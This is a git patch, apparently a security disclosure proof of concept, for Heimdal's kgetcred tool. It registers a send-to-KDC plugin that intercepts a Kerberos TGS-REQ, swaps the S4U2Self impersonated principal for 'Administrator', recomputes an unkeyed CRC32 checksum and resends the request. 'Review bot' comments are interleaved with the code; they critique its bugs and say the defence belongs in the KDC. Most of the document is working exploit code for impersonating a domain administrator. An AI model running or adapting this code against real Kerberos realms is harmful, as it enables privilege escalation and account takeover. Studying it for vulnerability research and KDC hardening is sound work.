From 9177b748bfba6408017a1a14fb06cc5202902c18 Mon Sep 17 00:00:00 2001
From: Isaac Boukris
Date: Wed, 14 Nov 2018 03:15:22 +0200
Subject: [PATCH] poc: unkeyed s4u2self checksum overwritten on wire
Signed-off-by: Isaac Boukris
---
 source4/heimdal/kuser/kgetcred.c | 119 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 119 insertions(+)
diff --git a/source4/heimdal/kuser/kgetcred.c b/source4/heimdal/kuser/kgetcred.c
index b95bc9d05e2..f92e1e5e3c2 100644
--- a/source4/heimdal/kuser/kgetcred.c
+++ b/source4/heimdal/kuser/kgetcred.c
@@ -31,6 +31,10 @@
 * SUCH DAMAGE.
 */
+#include
+
+#include "krb5_locl.h"
+
 #include "kuser_locl.h"
 static char *cache_str;
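Review bot: Including the library-private `krb5_locl.h` from a command-line tool couples kgetcred to libkrb5 internals; it is needed only because the plugin added further down calls the underscore-prefixed `_krb5_s4u2self_to_checksumdata`, and the include should say so, e.g. `/* private header: needed for _krb5_s4u2self_to_checksumdata() */`. The first added include has lost its header name in rendering; from the `static bool` used later it is presumably the one providing `bool`, but that cannot be confirmed here.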
@@ -91,6 +95,116 @@ usage(int ret)
 exit (ret);
 }
+static krb5_error_code
+plugin_init(krb5_context context, void **pctx)
+{
+ *pctx = NULL;
+ return 0;
+}
+
+static void
+plugin_fini(void *ctx)
+{
+}
+
+static krb5_error_code
+plugin_send_to_kdc(krb5_context context,
+ void *ctx,
+ krb5_krbhst_info *ho,
+ time_t timeout,
+ const krb5_data *in,
+ krb5_data *out)
+{
+ return KRB5_PLUGIN_NO_HANDLE;
+}
+
+static krb5_error_code
+my_plugin_send_to_realm(krb5_context context,
+ void *ctx,
+ krb5_const_realm realm,
+ time_t timeout,
+ const krb5_data *in,
+ krb5_data *out)
+{
+ krb5_error_code ret;
+ KDC_REQ req;
+ const PA_DATA *sdata;
+ size_t used;
+ krb5_data mod_buf;
+ krb5_crypto crypto;
+ krb5_data data;
+ PA_S4U2Self self;
+ const char *str;
+ krb5_principal mod_princ;
+ int i = 0;
+
+ static bool off = false;
+
+ if(off)
+ return KRB5_PLUGIN_NO_HANDLE;
+
+ ret = decode_TGS_REQ(in->data, in->length, &req, &used);
+
+ if (ret)
+ return KRB5_PLUGIN_NO_HANDLE;
+
+ sdata = krb5_find_padata(req.padata->val, req.padata->len,
+ KRB5_PADATA_FOR_USER, &i);
+ if (sdata == NULL)
+ return KRB5_PLUGIN_NO_HANDLE;
+
+ ret = decode_PA_S4U2Self(sdata->padata_value.data,
+ sdata->padata_value.length,
+ &self, NULL);
+ if (ret)
+ return ret;
+
+ ret = krb5_parse_name(context, "Administrator", &mod_princ);
+ if (ret)
+ return ret;
+
+ self.name = mod_princ->name;
+
+ ret = _krb5_s4u2self_to_checksumdata(context, &self, &data);
+ if (ret)
+ return ret;
+
+ ret = krb5_create_checksum(context,
+ NULL,
+ KRB5_KU_OTHER_CKSUM,
+ CKSUMTYPE_CRC32,
+ data.data,
+ data.length,
+ &self.cksum);
+
+ ASN1_MALLOC_ENCODE(PA_S4U2Self, req.padata->val[i].padata_value.data,
+ req.padata->val[i].padata_value.length, &self, &used, ret);
+ if (ret)
+ return ret;
+
+ ASN1_MALLOC_ENCODE(TGS_REQ, mod_buf.data, mod_buf.length, &req, &used, ret);
+ if (ret)
+ return ret;
+
+ off = true;
+
+ ret = krb5_sendto_kdc(context, &mod_buf, &realm, out);
+ if (ret)
+ krb5_err(context, 1, ret, "krb5_sendto_kdc");
+
+ off 
= false;
+
+ return 0;
+}
+
+static krb5plugin_send_to_kdc_ftable my_plugin_ftable = {
+ KRB5_PLUGIN_SEND_TO_KDC_VERSION_2,
+ plugin_init,
+ plugin_fini,
+ plugin_send_to_kdc,
+ my_plugin_send_to_realm
+};
+
 int
 main(int argc, char **argv)
 {
@@ -160,6 +274,11 @@ main(int argc, char **argv)
 krb5_err(context, 1, ret, "krb5_parse_name %s", impersonate_str);
 krb5_get_creds_opt_set_impersonate(context, opt, impersonate);
 krb5_get_creds_opt_add_options(context, opt, KRB5_GC_NO_STORE);
+
+ ret = krb5_plugin_register(context, PLUGIN_TYPE_DATA, KRB5_PLUGIN_SEND_TO_KDC, &my_plugin_ftable);
+ if (ret)
+ krb5_err(context, 1, ret, "krb5_plugin_register");
+
 krb5_free_principal(context, impersonate);
 }
--
2.14.4
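Review bot: `req.padata` is dereferenced unguarded in the `krb5_find_padata` call of my_plugin_send_to_realm; padata is optional in a KDC-REQ, so a TGS-REQ carrying no pre-authentication data would crash here instead of being passed through, and `if (req.padata == NULL) return KRB5_PLUGIN_NO_HANDLE;` belongs before it. The `ret` from `krb5_create_checksum` is never examined because the following `ASN1_MALLOC_ENCODE` overwrites it, so a failed checksum computation would still be encoded and sent; an `if (ret) return ret;` after that call is missing. Nothing decoded or allocated in the function is released on any path (`req`, `self`, `data`, `mod_buf`, `mod_princ`, and the original `padata_value.data` that the encode replaces), and since `self.name` aliases `mod_princ->name` a later call to the generated free routine for `PA_S4U2Self` would double-free, which deserves a comment such as `/* self.name borrows mod_princ->name; never free self through the generated routine */`. The locals `crypto` and `str` are declared but never used and will draw warnings. The NULL crypto handle with `CKSUMTYPE_CRC32` is the unkeyed checksum the subject line refers to; the effective defence is on the KDC side, which should presumably reject PA-FOR-USER whose checksum is not keyed, not in this client code.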